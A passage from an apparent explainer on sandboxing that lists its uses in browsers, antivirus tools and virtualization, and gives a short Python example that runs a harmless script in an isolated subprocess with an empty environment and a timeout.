vulnerabilities and malware.
5. Web Browsing: Browsers use sandboxes to isolate web pages, ensuring
one doesn’t affect others.
6. Malware Protection: Antivirus software uses sandboxes to safely
examine suspicious files.
7. Virtualization: Virtual machines and containers offer sandboxing
through encapsulation.
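A minimal sketch of the isolation idea behind sandboxing: run an untrusted script in a separate process with a stripped environment and a hard timeout. This is only a simplification; real sandboxes add OS-level controls such as containers, seccomp profiles, or dedicated virtual machines.

import subprocess
import sys

untrusted_script = "print(sum(range(10)))"   # stand-in for unverified code

# A separate process with an emptied environment and a timeout limits what the
# code can reach and how long it can run.
result = subprocess.run(
    [sys.executable, "-c", untrusted_script],
    capture_output=True,
    text=True,
    timeout=5,
    env={},          # no inherited environment variables
)
print("exit code:", result.returncode)
print("output:", result.stdout.strip())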